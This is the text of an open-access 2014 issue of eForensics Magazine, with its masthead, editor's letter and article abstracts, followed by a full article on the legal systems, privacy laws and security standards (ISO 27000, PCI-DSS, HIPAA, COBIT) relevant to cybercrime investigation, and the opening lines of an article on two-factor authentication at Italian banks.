eforensics open 2014-2


  • 8/10/2019 EForensics Open 2014-2

    1/72


    TEAM

    Editor: Joanna [email protected]

    Betatesters/Proofreaders: Olivier Caleff, Kishore P.V., Johan Scholtz, Mark Dearlove, Massa Danilo, Andrew J. Levandoski, Robert E. Vanaman, Tom Urquhart, M1ndl3ss, Henrik Becker, James Fleit, Richard C Leitz Jr

    Senior Consultant/Publisher: Paweł Marciniak

    CEO: Ewa Dudzic [email protected]

    Marketing Director: Joanna Kretowicz [email protected]

    Art Director: Ireneusz Pogroszewski [email protected]

    DTP: Ireneusz Pogroszewski

    Publisher: Hakin9 Media Sp. z o.o. SK, 02-676 Warszawa, ul. Postępu 17D

    Phone: 1 917 338 3631

    www.eforensicsmag.com

    DISCLAIMER!

    The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

    Dear Readers,

    We are pleased to present you our new OPEN issue "CyberCrime and CyberSecurity" of eForensics Magazine with open access, so that everybody interested in the subject is able to download it free of charge. This edition was carefully prepared to present our Magazine to a wider range of readers. We hope that you will enjoy reading our Magazine and that the subjects covered in this issue will help you to stay updated and aware of all possible pitfalls!

    This particular edition will focus on the importance of legal and regulatory aspects for cybersecurity and cybercrime. You cannot overestimate the importance and necessity of eForensic analysis in a society where the Internet assumes the biggest and on-going change in our lifetime. We use forensic analysis with the purpose of crime investigation; but to do that effectively we should understand which laws and regulations have been broken. It is crucial to understand what legal systems exist, what the types of law, standards and types of cybercrime are, what part the computer system plays and, of course, how one can apply this knowledge.

    Additionally, we will cover the topic of CSA STAR Certification, an effective way of evaluating and comparing cloud providers. Technological developments, constricted budgets, and the need for flexible access have led to an increase in business demand for cloud computing. Many organizations are wary of cloud services due to apprehensions around security issues. eForensics Magazine in cooperation with BSI GROUP prepared an excellent workshop where you can master the knowledge required to get CSA STAR Certification.

    What's more, we added one article from our Packet Analysis workshop as a trial. More materials can be found under http://eforensicsmag.com/course/packetanalysis/ .

    Read our new issue and get all the answers you were looking for!

    We would like to thank you for your interest and support and invite you to follow us on Twitter and Facebook, where you can find the latest news about our magazine and great contests. Do you like our magazine? Like it, share it! We appreciate your every comment and would be pleased to know what your expectations towards our magazine are!

    Keep your information safe and do not forget to send us your feedback. Your opinion is important to us!

    Valeriia Vitynska

    eForensics Assistant Manager

    and eForensics Team


    CYBERCRIME AND CYBERSECURITY: THE LEGAL AND REGULATORY ENVIRONMENT
    by Iana Fareleiro and Colin Renouf

    In this article we will look at the environment in which eForensics exists; the legal and regulatory regimes in which systems and cyber criminals operate. We perform forensic analysis on systems to investigate a crime and hopefully prosecute a criminal; but to do that we need to understand which laws and regulations have been broken. There are pitfalls in working out what laws and regulations are in operation for a particular context; as what is illegal in one regime may not be in another, and is it the law in the location of the system or the criminal that applies? The information here forms the underlying legal knowledge in the CISSP certification and underpins the International Information Systems Security Certification Consortium (ISC)2 knowledge.

    ARE 2 FACTOR AUTHENTICATIONS ENOUGH TO PROTECT YOUR MONEY? TARGETING ITALIAN BANK AND CUSTOMERS
    by Davide Cioccia and Senad Aruch

    During the last few years banks, and different financial institutions, have been trying to protect against or prevent fraud and cyber-attacks from accessing their customers' credentials. They increased security and login factors to avoid these kinds of problems. One of these is Two Factor Authentication (2FA), used alongside username and password to protect the bank account.

    AN OVERVIEW OF CLOUD FORENSICS
    by Dejan Lukan

    When discussing cloud forensics, we're actually talking about the intersection between cloud computing and network forensic analysis. Cloud computing basically refers to a network service that we can interact with over the network; this usually means that all the work is done by a server somewhere on the Internet, which might be backed up by physical or virtual hardware. In recent years, there has been a significant increase in the use of virtualized environments, which makes it very probable that our cloud service is running somewhere in a virtualized environment.

    AUTHENTICATING REMOTE ACCESS FOR GREATER CLOUD SECURITY
    by David Hald, co-founder, chief relation officer

    The nature and pace of business have changed as technology has opened new possibilities for organizations. One of these possibilities is cloud services, which benefit companies by enabling remote access to data stored offsite. Its convenience has made cloud services incredibly popular, both to business and malicious actors. With so much data at stake, the rise in the use of remote access necessitates ironclad security. Authenticating the identities of users remotely accessing these resources has never been more critical.

    PACKET ANALYSIS WITH WIRESHARK AND PCAP ANALYSIS TOOLS
    by Eric A. Vanderburg

    Almost every computer today is connected. Their communication with others takes the form of packets which can be analyzed to determine the facts of a case. Packet sniffers are also called network analyzers, as they help in monitoring every activity that is performed over the Internet. The information from packet sniffing can be used to analyze the data packets that uncover the source of problems in the network. The important feature of packet sniffing is that it captures data that travels through the network, irrespective of the destination. A log file will be generated at the end of every operation performed by the packet sniffer and the log file will contain the information related to the packets.

    UNDERSTANDING DOMAIN NAME SYSTEM
    by Amit Kumar Sharma

    Domain Name System (DNS) spoofing, also referred to as DNS cache poisoning in the technical world, is an attack wherein junk (customized data) is added into the Domain Name System name server's cache database, which causes it to return incorrect data, thereby diverting the traffic to the attacker's computer.

    CSA CERTIFICATION OFFERS SIMPLE, COST EFFECTIVE WAY TO EVALUATE AND COMPARE CLOUD PROVIDERS
    by John DiMaria

    Technological developments, constricted budgets, and the need for flexible access have led to an increase in business demand for cloud computing. Many organizations are wary of cloud services, however, due to apprehensions around security issues. Ernst & Young conducted a survey of C-level leaders in 52 countries which showed a unified concern over the accelerated rate at which companies are moving information to the cloud and the subsequent demise of physical boundaries and infrastructure.

    ROAD MAP TO CSA STAR CERTIFICATION: OPTIMIZING PROCESSES, REDUCING COST AND MEETING INTERNATIONAL REQUIREMENTS
    by John DiMaria

    For centuries, the Swiss dominated the watchmaking industry and their national identity was somewhat tied to their expertise in the precision mechanics required to make accurate timepieces. Yet the Swiss were so passionate about their expertise that they hesitated to embrace the new technology in watchmaking with batteries and quartz crystals. With Japan's introduction of the quartz wristwatch in 1969, the majority Swiss market share dropped from 80% at the end of World War II to only 10% in 1974 (Aran Hegarty, Innovation in the Watch Industry, Timezone.com, November 1996, http://people.timezone.com/library/archives/archives0097). Ironically, it was the Swiss who had invented the quartz watch but failed to see its potential.

    EFORENSICS CSA STAR CERTIFICATION: SUPPLY CHAIN MANAGEMENT USING CSA STAR CERTIFICATION
    by John DiMaria

    When an organization adopts cloud services, it is in fact expanding its operations from a local or regional presence to a more global one. As a result, the corresponding organizational operations strategy needs to be adjusted to align with these changes. A more formal analysis of the supply chain as part of a more comprehensive due diligence review also needs to be considered (by definition, the Cloud Controls Matrix (CCM) is a baseline set of security controls created by the Cloud Security Alliance to help enterprises assess the risk associated with a cloud computing provider).

    CONTINUOUS MONITORING: CONTINUOUS AUDITING/ASSESSMENT OF RELEVANT SECURITY PROPERTIES
    by John DiMaria

    While the Cloud Security Alliance's (CSA) STAR Certification has certainly raised the bar for cloud providers, any audit is still a snapshot of a point in time. What goes on between audits can still be a blind spot. To provide greater visibility, the CSA developed the Cloud Trust Protocol (CTP), an industry initiative which will enable real time monitoring of a CSP's security properties, as well as providing continuous transparency of services and comparability between services on core security properties (Source: CSA CTP Working Group Charter). This process is now being further developed by BSI and other industry leaders. CTP forms part of the Governance, Risk, and Compliance stack and the Open Certification Framework as the continuous monitoring component, complementing point-in-time assessments provided by STAR certification and STAR attestation. CTP is a common technique and nomenclature to request and receive evidence and affirmation of current cloud service operating circumstances from CSPs.


    CYBERCRIME AND CYBERSECURITY: THE LEGAL AND REGULATORY ENVIRONMENT

    by Iana Fareleiro and Colin Renouf

    eForensic analysis becomes essential and necessary in a society where the Internet assumes the biggest and on-going change in our lifetime. It will take place as a result of a crime or investigation. However, what is relevant and worth searching for, or even what can be legally analyzed, depends on the legal systems and regulations, the criminal and, maybe, even customers or users affected.

    The laws broken may be existing laws pertaining to theft or threats of violence where the computer systems are central, or the computer system may be on the periphery of the crime, or it may be specific information systems or computer privacy laws and regulations that are relevant; possibly even a combination of all of them. These laws and regulations may conflict, and what is illegal in one country or region may not be illegal in another.

    As cyber security experts we need to understand what we are aiming to prove and what data we can legally investigate before we begin our work.

    In addition to existing laws within the legal systems at work, specific cyber laws were created to protect individuals, companies and governments against cyber crime; these can be divided into three categories:

    • Computer-assisted crime is where a computer is used as a tool to assist in committing a crime.

    • Computer-targeted crime happens when a computer was the main target and victim of an attack.

    • The last category includes situations where the computer happens to be involved in a crime but is not the attacker or attackee, and is peripheral to the crime itself.

    These categories were created to facilitate the law enforcement of cyber crimes. Laws can be general and include numerous scenarios, instead of the need to create specific laws for each individual case.

    What you will learn:

    In this article we will look at the environment in which eForensics exists; the legal and regulatory regimes in which systems and cyber criminals operate. We perform forensic analysis on systems to investigate a crime and hopefully prosecute a criminal; but to do that we need to understand which laws and regulations have been broken. There are pitfalls in working out what laws and regulations are in operation for a particular context; as what is illegal in one regime may not be in another, and is it the law in the location of the system or the criminal that applies? The information here forms the underlying legal knowledge in the CISSP certification and underpins the International Information Systems Security Certification Consortium (ISC)2 body of knowledge.


    The idea is to use the existing laws for any crime where possible, allowing an easier understanding of the basis for prosecution for all people involved, including the judge and jury, who can then provide the verdict and sentence based on existing guidelines and standards.

    The downside of introducing specific cyber laws is that, for example, when companies are attacked they just want to ensure that the vulnerability exposed is fixed and avoid any embarrassment that would adversely affect the company reputation. Even when information as to an attack leaks out, companies do not seem interested in spending time and money in courts; preferring to minimize the time of embarrassment. This is the main reason why cyber criminals go unpunished and easily get away with such illegal actions. Not many companies wish to be known as the victim of a cyber attack since that can adversely influence customer confidence and scare away investors.

    LEGAL SYSTEMS

    There are essentially four different models of legal systems: civil law, common law, religious law, and customary law.

    CIVIL LAW

    In civil law, employed by most countries, a legislative branch of the government develops and documents statutes and laws, and then a judiciary has some latitude for interpreting them. The legislation is prescriptive, so legal precedent, whilst existing, has little force. In some such systems, such as those derived from Roman law or the later Napoleonic code, the judge assesses the proof as a measure of guilt of the criminal.

    COMMON LAW

    This system, used in the UK, US, Canada, Australia and other former British colonies amongst others, is often derived from the English legal system. A legislative branch of government still produces statutes and laws, but great emphasis is placed on judicial interpretation, precedent and existing case law; which can even override and supersede the legislation and statute if a conflict is found to occur. Thus, time is important in this system as judicial interpretation may develop, and traditional interpretation of custom and natural law acts as a basis for the system. The judiciary and its interpretation of the legislation and precedent in existing case law has a greater role in this system than in the civil law system. In the English legal system and its derivatives the role of the jury in interpreting the evidence in assessing the burden of proof is common.

    RELIGIOUS LAW

    In religious law, such as Sharia Law adopted by several Islamic countries and groups, religious texts and doctrine provide the basis for the legal system, rather than separate statute and legislation. Here the given religion is accepted by the majority of the people or their rulers, such that its rules essentially become laws by which the people abide. The laws enforced may be interpreted from the appropriate religious texts by religious leaders, such as imams or ayatollahs.

    CUSTOMARY LAW

    In this model, existing regional customs accepted by the majority of the people over a period of time provide the basis for the legal system, to the extent that they essentially become laws by which the people abide. These customs may later be codified to some extent. This model is seen in the other legal models in duty of care and best practice interpretation, where what would be expected of a reasonable man is used as a measure; such as in the tort law of the civil law branch of common law.

    TYPES OF LAWS

    Within common law itself, civil law plays a part, alongside criminal law, tort law and administrative law. As groups of countries collaborate, such as in the European Union (EU), the combinations become more complex, but the types of law are common at the core due to the prevalence of the English legal system and its derivatives in the UK, US, Australia, etc.

    CRIMINAL LAW

    In criminal law the aim is law and order for the common citizen and deterrence of criminals when punishing offenders; so the victim of the crime is considered to be society itself from the view of the prosecution, even though the actual victim may be a person or persons. Hence the existence of the Crown Prosecution Service (CPS) in the UK for pursuing the criminal through the courts under criminal law with an aim to remove the offender from affecting society. The criminal is incarcerated or even deprived of his or her life under some circumstances, so there is an emphasis on the burden of proof being beyond reasonable doubt.

    CIVIL LAW

    Here the individual has been wronged and seeks legal recourse in terms of damages from a civil defendant, rather than loss of liberty, with the standard of evidence essentially reduced from beyond all reasonable doubt to a likelihood known as a preponderance, i.e. more likely than not. The damages for the wrongdoing may be statutory as prescribed by law, compensatory to attempt to balance loss or injury, or punitive to discourage and deter from future legal violation.

    TORT LAW

    This is a branch of civil law related to wrongdoing against an individual measured against best practice or duty of care, where the action taken or negligence of responsibility of an individual or organization is considered to be outside the bounds of behavior expected of a reasonable, right thinking, or prudent man; and in this it relates back to custom, and often may change over time. Here again, the burden of proof is on the preponderance of the evidence weighing against the defendant. This is the largest source of lawsuits and damages under major legal systems.

    This is particularly important in the realm of cyber security laws. In protecting customer data the Prudent Man Rule is applied to set the bar for duty of care in what processes, infrastructure and practices a right thinking person would consider necessary as a minimum. If a business is seen to be below that bar of expectation then the organization and business stakeholders are considered negligent in providing the necessary due care to protect its customers, assets and business stakeholders.

    A company has to exercise due diligence continuously in reviewing its own and third party partners and processes to ensure that the necessary standard of due care is being met. As the technologies and threats in the industries adapt all of the time, due diligence ensures the minimum bar changes accordingly. Whenever a new third party is brought into a company's processes, the necessary due diligence in assessing that party for past criminal history, threats and their own due care protection standards and due diligence processes must be performed.

    CONTRACT LAW

    Agreements between companies and individuals can be broken, whether verbal or documented in writing, and damages for wrongdoing can occur. This is again a type of civil law.

    ADMINISTRATIVE AND REGULATORY LAW

    This covers governance, compliance and regulatory laws relating to government and government agencies. Governments enact these laws with less influence from the judiciary. Compliance laws, such as Sarbanes-Oxley, come under this branch of the legal system.

    INTELLECTUAL PROPERTY LAWS

    One of the targets in many cyber crimes is stealing intellectual property, so companies go to great technical and legal lengths to protect it. Whilst intellectual property isn't physical in nature, companies require creativity and then investment to capitalize on it. It takes a number of forms, from trademarks, copyright, licenses and patents to even simple trade secrets that a company entrusts to its staff.

    A trademark is a name, image or logo for a brand that is used in marketing and is associated with a brand by its customers and competitors; and it may be formally registered or unregistered. Whilst stealing the logo itself is not usually a major criminal target, in phishing attacks a logo may be used to misrepresent the cyber criminal's web site as that of the company owning the brand.

    Copyright is the right of an owner of a musical, artistic or literary work to own, duplicate, distribute and amend that work themselves. Often cyber criminals will duplicate a copyrighted work and sell it or provide it for download as their own property.

    A patent is a legal agreement protecting the use of an idea or invention such that the patent holder has exclusive rights on the use and licensing of that idea for a period of time covered by the patent. Some rogue nations and cyber criminals will ignore the patent and use the invention or idea as their own, and legal recourse is then required by the patent holder to obtain compensation. A license is a contract between a vendor and consumer or business to use software within the bounds of an end user license agreement, and not duplicate, modify, redistribute or sell on that software.

    A trade secret is proprietary information belonging to a business in a competitive market that its staff and third parties should not divulge, and is often subject to a non-disclosure agreement (NDA) that is a contract between the business and a third party or employee to not divulge that secret. The business must exercise due care to protect that trade secret.

    DATA PRIVACY LAWS

    With the rise in cyber crime and the stealing of customer data being a regular objective of the cyber criminal, most countries and states introduced their own data protection laws. These cover the processes and expected standard behavior for protecting data, but often also include clauses as to where that data can be located and in what countries and under what circumstances it can be shared.

    In the US the Privacy Act of 1974 protects the data held by the US government on its citizens, and how it is collected, transferred between departments, and used; with individuals having legal recourse on being able to request access to the data held about them, with national security providing the main limitation to that access. Similarly, in the European Union the EU Data Protection Directive sets the boundaries on the collection and flow of personal data between member nations; with a fine line between the needs of commerce between different member nations and the privacy of the individual. The EU principles are considered more stringent than those of the US, so the EU-US Safe Harbor legal framework allows EU data to be shared with US organizations if they adhere to the more stringent EU Data Protection Directive principles.

    The EU Data Protection Directive principles are:

    • Individuals must be notified how their personal data is collected and used

    • Individuals must be able to opt out of sharing their data with third parties

    • Individuals must opt in to sharing sensitive personal data

    • Reasonable protections must be in place to protect the personal data

    This latter rule brings in the duty of care legal measure.

    The United States Code Section 1030 Title 18, usually known as the Computer Fraud and Abuse Act, defines the environment in which systems are considered to have been attacked in government and commercial organizations and the recourse against the criminal. This was amended by the Patriot Act 2001 as a response to the September 11th attacks to allow easier implementation of wiretaps by law enforcement agencies and easier sharing of data between those agencies, along with more stringent punishment for damaging a protected system from the original act or dealing with individuals on the sanctions list. The Identity Theft Act further amends the original act to provide additional protection for the individual.

    STANDARDS

    International bodies, industries, and some groups of companies may produce their own standards with which individuals and companies may comply, and claiming such compliance is a requirement for taking part in that industry from a financial or regulatory perspective, or may be required as part of a contract. So, companies supporting payments with debit and credit cards usually have to adhere to the PCI-DSS standards mandated by the card industry vendors, and health service vendors in the US must deliver to HIPAA data security standards for patient data as mandated by US administrative law.

    In the early days of networked IT (1995) the British Standards Institute started to develop BS7799, which outlines how an information security management system should be designed, built and maintained; with guidelines on what is necessary in the form of policies and processes, along with the technologies necessary to holistically protect sensitive information from the physical, to the network, to the electronic. From this the ISO/IEC 27000 standards were developed; using an iterative process where objectives and plans are formed (Plan), then implemented (Do), the results measured to see if the objectives were met (Check), and then amendments made as necessary (Act). The whole iterative process is known as the PDCA cycle.


    ISO27000

    The ISO and International Electrotechnical Commission (IEC) standards bodies jointly issue the ISO 27000 Information Technology Security Techniques family of standards for information security management best practice for risks and controls; which was, as mentioned, derived from the earlier BS7799 British Standard and the later ISO/IEC 17799 standard. These bodies have a committee called Joint Technical Committee 1 (JTC 1) Subcommittee 27 (SC27) that meets twice a year to consider and ratify the standards and amendments to provide the information security management system (ISMS), with the 27000 base standard providing an overview of the complete family of policy-oriented standards and the vocabulary used throughout. The individual standards are as follows:

    ISO/IEC Standard   Description

    27000     Information security management systems - Overview and vocabulary
    27001     Information security management systems - Requirements
    27002     Code of practice for information security management
    27003     Information security management system implementation guidance
    27004     Information security management - Measurement
    27005     Information security risk management
    27006     Requirements for bodies providing audit and certification of information security management systems
    27007     Guidelines for information security management systems auditing
    27008     Guidance for auditors on ISMS controls
    27010     Information security management for inter-sector and inter-organizational communications
    27011     Information security management guidelines for telecommunications organizations based on ISO/IEC 27002
    27013     Guideline on the integrated implementation of ISO/IEC 27001 and ISO/IEC 20000-1
    27014     Information security governance
    27015     Information security guidelines for financial services
    27017     Information security management for cloud systems
    27018     Data protection for cloud systems
    27019     Information security management guidelines based on ISO/IEC 27002 for process control systems specific to the energy utility industry
    27031     Guidelines for information and communication technology readiness for business continuity
    27032     Guideline for cybersecurity
    27033     IT network security, a multi-part standard based on ISO/IEC 18028:2006
    27033-1   Network security - Part 1: Overview and concepts
    27033-2   Network security - Part 2: Guidelines for the design and implementation of network security
    27033-3   Network security - Part 3: Reference networking scenarios - Threats, design techniques and control issues
    27033-5   Network security - Part 5: Securing communications across networks using Virtual Private Networks (VPNs)
    27034-1   Application security - Part 1: Guidelines for application security
    27035     Information security incident management
    27036     Information security for supplier relationships
    27036-3   Information security for supplier relationships - Part 3: Guidelines for information and communication technology supply chain security
    27037     Guidelines for identification, collection, acquisition and preservation of digital evidence
    27038     Specification for redaction of digital documents
    27039     Intrusion detection and protection systems
    27040     Guideline on storage security
    27041     Assurance for digital evidence investigation methods
    27042     Analysis and interpretation of digital evidence
    27043     Digital evidence investigation principles and processes
    27799     Information security management in health using ISO/IEC 27002


    These arent laws, but many contracts will insist that participants adhere to the complete body of thestandard, or its individual components. Adherence to the standard or its components can also be usedas a quality measure, and can act as a selling point; and in negotiations this can be important. Therefore,this standard can appear in the enacting of contract law.

    The individual components cover investigation and forensic analysis, as well as relationships with thirdparties. However, one of the key areas where the standard impacts the legal environment for cyber se-curity is in the influence it has had on other standards and regulations that can be enforced as the costof doing business in some industries, e.g. PCI-DSS in companies involved in credit card sales. Whenevaluating compliance or where criminal responsibility is being assessed ISO/IEC27000 provides a ba-sis by which what is expected of the reasonable man can be measured from a legal perspective.

    INFORMATION TECHNOLOGY INFRASTRUCTURE LIBRARY (ITIL)

    ITIL, like the foundations of ISO/IEC 27000, was developed by the UK government, with the aim of standardizing and documenting service management and aligning IT with the business through a common language. IT should provide good customer service to the business it serves. Whilst not providing a security framework, it does cover support, change and maintenance processes and all of the foundations for business continuity and disaster recovery management, with great strength in incident management.

    It covers supplier management, service level management, service catalog management, availability management, incident management, event management, problem management, change management, knowledge management, release and deployment management, service testing and validation, and the requirements of a configuration management system. It has processes for service design, service operation and service transition. Across all of this is continual process improvement as a result of service reporting and service measurement. At the core of ITIL is the concept of IT as a service.

    Again, ITIL is referenced in contracts and often used as a selling point, but in the legal world outside of contracts it is more useful as a measure of the expectations of the reasonable man.

    CONTROL OBJECTIVES FOR INFORMATION AND RELATED TECHNOLOGIES (COBIT)

    This was produced by the Information Systems Audit and Control Association (ISACA) in 1996 as a general framework of processes, policies and governance for the management of IT as a whole, not just security; the current version aligns with ITIL and the ISO/IEC 27000 standards to provide a full framework and model for IT as the basis of a capability maturity model.

    It splits IT into domains: Plan and Organize; Acquire and Implement; Deliver and Support; and Monitor and Evaluate. Across these it includes a framework, process descriptions, control objectives, management guidelines and maturity models.

    Whilst ISO/IEC 27000 provides high-level guidelines and processes, the COBIT model contains specific details, such as for user access management and compliance, and for how to work with third parties, with a lot of helpful security detail particularly in the Plan and Organize and Acquire and Implement domains, and with processes heavily emphasized in the other two domains.

    Again, as with ISO/IEC 27000, COBIT is often referenced as a selling point or in contracts, but it also provides specific processes that tie in with the reasonable man assessment from a legal perspective.

    PAYMENT CARD INDUSTRY DATA SECURITY STANDARD (PCI-DSS)

    The major card companies (e.g. Visa, MasterCard, American Express, JCB, etc.) got together in 2006 to come up with a set of standards for data security that could be measured and enforced for companies wishing to participate in payment card processing. Annually, a Qualified Security Assessor (QSA) creates a report on compliance with the standard, which is split into 12 requirements in 6 groups.


    Control objectives and PCI-DSS requirements

    Build and Maintain a Secure Network
        1. Install and maintain a firewall configuration to protect cardholder data
        2. Do not use vendor-supplied defaults for system passwords and other security parameters

    Protect Cardholder Data
        3. Protect stored cardholder data
        4. Encrypt transmission of cardholder data across open, public networks

    Maintain a Vulnerability Management Program
        5. Use and regularly update anti-virus software on all systems commonly affected by malware
        6. Develop and maintain secure systems and applications

    Implement Strong Access Control Measures
        7. Restrict access to cardholder data by business need-to-know
        8. Assign a unique ID to each person with computer access
        9. Restrict physical access to cardholder data

    Regularly Monitor and Test Networks
        10. Track and monitor all access to network resources and cardholder data
        11. Regularly test security systems and processes

    Maintain an Information Security Policy
        12. Maintain a policy that addresses information security

    The aim of the PCI-DSS standard is to ensure consistency across the card payments industry in the way that customer details, and the card data needed to make payments, are protected and handled. It covers requirements for technology, processes and the relationships with the business and the staff involved. From a customer perspective this acts to protect customers, in that companies adhering to the PCI standard can be trusted to look after the data, and later fraud would be unexpected. Reviews of continued compliance are required of any company adopting PCI, with the QSA making an assessment and recommendations for any areas where improvement is required.

    So adherence to PCI is usually contractual, which is how it relates to the law; yet again, anyone dealing with payment card data would be expected to follow the recommendations within the standard, and this fits with the reasonable man assessment within legal frameworks. Whilst US federal law doesn't mandate that companies dealing with card data adhere to PCI-DSS, the laws in some US states and elsewhere do refer to it, so it is likely to become law in the future. MasterCard and Visa require service providers and merchants to be validated for PCI-DSS compliance, and banks must be audited, whereas validation isn't mandatory for all entities.

    HEALTH INSURANCE PORTABILITY AND ACCOUNTABILITY ACT (HIPAA)

    HIPAA is a US federal law that covers many areas, but part of it also includes standards for data privacy that overlap with the data privacy laws of some countries and also tie back to the reasonable man rule in the gray area between law and standard. Therefore, many information security certifications (e.g. CISSP) and standards reference the act and its standards worldwide. The objective of the HIPAA regulatory framework was to provide a secure way for the health insurance records of US citizens to be shared between providers when changing or losing jobs, ensuring not only that any confidential personal information or medical condition information was physically protected, but also that policies were in place to ensure their health insurance benefit position was maintained.

    The act is in two parts. The first part (Health Care Access, Portability, and Renewability) covers the policies by which US citizens maintain their health insurance across providers and what their entitlement is when switching providers, and as such isn't applicable to the information security realm at the detail level. The second part (Preventing Health Care Fraud and Abuse; Administrative Simplification; Medical Liability Reform) and its details on data privacy are more relevant to information security professionals; it is here that granular standards exist and there is an overlap with data privacy laws elsewhere.

    The Privacy Rule and Security Rule subsections are key here, and the latter includes the standards. The Security Rule is split into Administrative Safeguards, Physical Safeguards and Technical Safeguards and includes standards for encryption, checksums, etc., as well as risk management and risk assessment processes. In interpreting adherence to these process standards the reasonable man rule is again brought into use from a legal perspective, as the prescriptiveness of the standards is open to interpretation and applicability at many levels.


    NATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY (NIST)

    This is not like the other paragraphs here, in that it refers to a standards-issuing body as a whole, like the ISO/IEC or BSI bodies referenced earlier; but it is mentioned due to its issuing of very detailed build, hardening and usage standards for IT and security that are often referenced by other standards (e.g. they are often used as the best-practice build and configuration standards for PCI-DSS compliance) and again act as a yardstick for the reasonable man rule in assessing whether a reasonable attempt was made to secure data.

    NIST maintains an Information Technology Portal with the Cybersecurity Framework, the Computer Security Resource Center, and other documentation and groups: http://www.nist.gov/.

    The US government maintains standard configuration documents for Windows 7 and Red Hat Enterprise Linux 5 on this site that show how builds should be done. Of more interest, beyond the reasonable man debate, are the standards and guidelines for eForensic analysis.

    THE PART PLAYED BY THE COMPUTER SYSTEM

    The computer may be a key part of the criminal or civil act, as in the breaking of cyber laws; or may be a peripheral part of the crime itself, as in electronic fraud; or may just be part of the evidence gathered to build a picture of the crime or criminal. The legal systems and industry standards have specific definitions for the role of the computer system in these contexts.

    Where the computer plays a role as a tool of the criminal, but the crime is a general one even though the computer is central to its commission, this is known as a computer as tool scenario. Stealing credit card information to commit fraud, or penetrating a system to steal company intellectual property secrets, would be examples of this scenario.

    Where the crime has the computer as the primary target or victim, particularly where information or cyber security laws are broken, we have a computer as target scenario. Hacking to install malware, deployment of computer viruses, and distributed denial of service attacks would be examples of this scenario.

    TYPES OF CYBER CRIME

    The crime being forensically investigated may be a breach of an existing law, such as theft or a violent act: fraud using a computer is still fraud, a threat of violence made online is still a threat of violence, and a computer could be used in hacking to bring about violence or death.

    An investigation may also be required for a specific cyber crime law that has been broken, one pertaining only to the use of a computer, such as hacking or denial of service for fun or for political motives.

    Finally, regulations that are legal and contractual in nature may be broken using a computer; so a system built to Payment Card Industry Data Security Standard compliance may be a key term in a contract, and non-compliance with the regulations then leads to a contractual violation.

    HOW DO WE APPLY THIS KNOWLEDGE?

    To perform forensic analysis we obviously first have to protect the evidence, but knowing what evidence we are allowed to access, and what is useful, first requires understanding which laws are believed to have been broken, the role of the computer, and what laws apply to the analyst doing the work. It isn't necessarily legal to perform forensic analysis and access the personal data of a potential criminal without breaking a privacy law.

    The most difficult cases are where the criminal is in one country or state, the target system is in another, the victim in yet another, and multiple countries have been traversed. Even within a single country like Australia or the United States, different laws can apply from state to state. This complexity is why so many computer-related crimes remain unprosecuted, along with the shame for a company in having been breached. The key to applying the legal knowledge, before doing what is needed to achieve a prosecution, is identifying what is common between the states and countries involved; new international frameworks of cooperation are being drawn up to assist in this.


    INTERNATIONAL LEGAL COOPERATION IN CYBER SECURITY

    The increase in cyber crime and the need for coordinated anti-terrorist cooperation across state and international boundaries has led to frameworks being drawn up, such as the Safe Harbor cooperation between the EU and US. More international work between governments is currently underway to make this easier, not initially due to basic cybercrime, but due to the need to combat terrorism and terrorist funding. The trick is to identify a common subset of protections against fraud and for personal data, work out from that to identify the maximum commonality between all the legal state or national entities, and then aim to prosecute in the jurisdiction where the criminal is most likely to be sentenced; remembering that avoiding breaking the law in any of the states or nations involved during the forensic investigation is a necessity.

    Post-graduate degrees specifically covering international cyber crime and security are beginning to spring up, such as the one being studied by the authors. Personal experience has shown that the specific state knowledge of experienced lawyers can come to nothing in this internationally complex area, so specializations in this niche are likely to grow in importance.

    THE INTERNATIONAL, FEDERAL AND STATE INTERPRETATION WHICH LAWS APPLY?

    In determining which laws apply to a particular scenario there are four separate considerations, which may involve different states, countries, and even international groups such as the EU. When a possible crime occurs involving a computer and data in the modern world, to work out which laws apply we must consider the location of the cyber criminal, the location of the system being attacked, the location of any victims, and the locations over which the data forming the attack travels.

    CRIME APPLICABILITY AND INVESTIGATION: AN EXAMPLE

    Consider a mobile phone payments application for purchasing foreign currency for international travellers. The user is from the UK, lands in Singapore, but uses a cell tower in Malaysia to enact transactions hosted on a system in Australia. Which laws apply? In this example, certain compliance restrictions on checking transactions in Malaysia and Singapore may mean that the application should use geolocation and cell tower identification to shut itself down and avoid an impossible legal situation. In forensic analysis after the fact, where access to personal data might be restricted in the place where the analysis is performed, this gets even more complex.

    So, if a crime is deemed to have occurred, consider first the question of which country the crime has been committed in. Then assess which police force or agencies will prosecute. However, taking the example of the different privacy acts enforced under EU, US, Australian, New Zealand and other laws, even sharing the evidence with the police can be an issue, because the personal data of the individual may only be seen by authorised agents of their own country. Often it is best to segregate the data, and even store it in a location within the given country (as is required for many Chinese financial systems), to avoid these complexities and give the best chance of prosecuting the criminal.

    WHAT HAVE WE LEARNED?

    We have looked at the basic types of legal system and how they differ between countries, and the different types of laws and regulations that can be broken, with different results for the defendant or perpetrator. We have then applied this to examples involving computers to see how complex the environment is in which cyber security experts must operate to investigate a crime and see what laws and regulations apply.

    ABOUT THE AUTHORS

    Colin Renouf is a long-standing IT worker, inventor, and author; currently an Enterprise Solution Architect in the finance industry, but having worked in multiple roles and industries over a period of decades. An eternal student, Colin has studied varied subjects in addition to IT. Having written and contributed to several books and articles on subjects ranging from IT architecture, Java, dyslexia, cancer, and security; he is even referenced on one of the most fundamental patents in technology and has been involved in the search for the missing MH370 aircraft. Colin has two incredibly smart and intelligent children, Michael and Olivia, who he loves very much. He would like to thank his co-author and best friend Iana; her lovely sister Taina, brother Tiago, mother Marciaa, and father Jose. What more is there to say, but thank you Red Bull.

    Iana Fareleiro works as an analyst as part of a fraud and compliance team for a payments card business and is studying a post-graduate cybersecurity and cybercrime course. Originally from Brazil, and having lived in Mozambique, South Africa and Zimbabwe, and eventually Portugal, she now lives in the UK in Peterborough. She is a movie buff of old, and a scientist at heart who gets great enjoyment out of intellectual argument with like-minded individuals. She would like to thank her sister Taina, brother Tiago, mother Marciaa, and father Jose; and boyfriend Luis.


    ARE 2 FACTOR AUTHENTICATIONS ENOUGH TO PROTECT YOUR MONEY? TARGETING ITALIAN BANKS AND CUSTOMERS

    by Davide Cioccia and Senad Aruch

    During the last few years banks and other financial institutions have been trying to prevent fraud and cyber-attacks that go after their customers' credentials. They have increased security and added login factors to counter these problems. One of these is Two-Factor Authentication (2FA), used alongside the username and password to protect the bank account.

